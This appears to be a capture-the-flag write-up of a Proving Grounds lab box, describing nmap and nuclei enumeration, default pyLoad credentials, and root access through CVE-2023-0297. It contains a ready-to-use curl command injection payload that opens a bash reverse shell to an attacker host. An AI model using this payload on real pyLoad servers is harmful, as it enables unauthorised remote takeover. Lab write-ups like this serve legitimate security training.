Enumeration

Nmap

Initial nmap scan revealed SSH and port 9666 was open.

00 - nmap

Web Enumeration

Visiting the website revealed it was pyLoad website.

01 - web

After some research I found pyLoad uses default credentials pyload:pyload initially. There was also a nuclei template for it.

02 - default creds

I executed nuclei and found that it is indeed using default credentials.

02 - default creds with nuclei

And visiting the info page revealed pyLoad 0.5.0 was running.

03 - pyload version

Exploit to Root

CVE-2023-0297

Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.

This version was vulnerable to RCE through command injection. After some research I found that all we need to do is execute a curl command like below:

curl -i -s -k -X POST --data-binary "jk=pyimport%20os;os.system(\"bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F${LHOST}%2F${LPORT}%200%3E%261%27\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa"  "${WEBHOST}/flash/addcrypted2"

But there was a repo (overgrowncarrot1/CVE-2023-0297), so I executed it.

04 - github

05 - exp

And executing it got me root shell.

06 - gg

<
Previous Post
Plum - Proving Grounds Practice
>
Next Post
SPX - Proving Grounds Practice